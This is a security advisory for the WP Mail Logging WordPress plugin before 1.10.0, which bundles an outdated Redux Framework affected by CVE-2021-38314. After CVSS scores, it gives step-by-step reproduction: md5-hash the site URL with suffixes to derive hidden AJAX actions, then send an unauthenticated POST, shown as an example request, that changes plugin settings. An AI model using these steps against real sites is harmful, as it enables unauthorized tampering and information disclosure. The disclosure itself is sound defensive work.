WP Mail Logging < 1.10.0 - Outdated Redux Framework

2021-11-2900:00:00

Rotem Reiss

115

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

JSON

The plugin uses an outdated version of the Redux Framework, which is know to be affected by security issues (CVE-2021-38312 and CVE-2021-38314), and could allow unauthenticated attackers to change some of the Framework settings by using CVE-2021-38314

The first endpoint we can identify is gathered from the website's URL (e.g., https://www.wordpress.com/) md5 hashed with the "-redux" suffix.

For example, for the above URL, the first endpoint will be: https://www.wordpress.com/wp-admin/admin-ajax.php?action=16a8ca2d7a9690742c2048ec7b7f0f56

Once you make a simple HTTP GET request to the first action, it will return the first part of the 2nd hash that we need for triggering the "support_args" method.

Take the hash returned from the first endpoint and md5 hash it with the "-support" suffix. This md5 hash endpoint can now be used to modify some of the plugin's settings (enable/disable logging).

For example: POST /wp-admin/admin-ajax.php?action=30cf1a163dd8a8787885585aee1e1973&redux_framework_disable_tracking=tru

Note that other parameters that can be passed in the URL are also pre-known to malicious actors, e.g., hash, i, and code.

Impact: An unauthenticated malicious actor can change the plugin's settings and possibly even make it print other sensitive information about the plugin.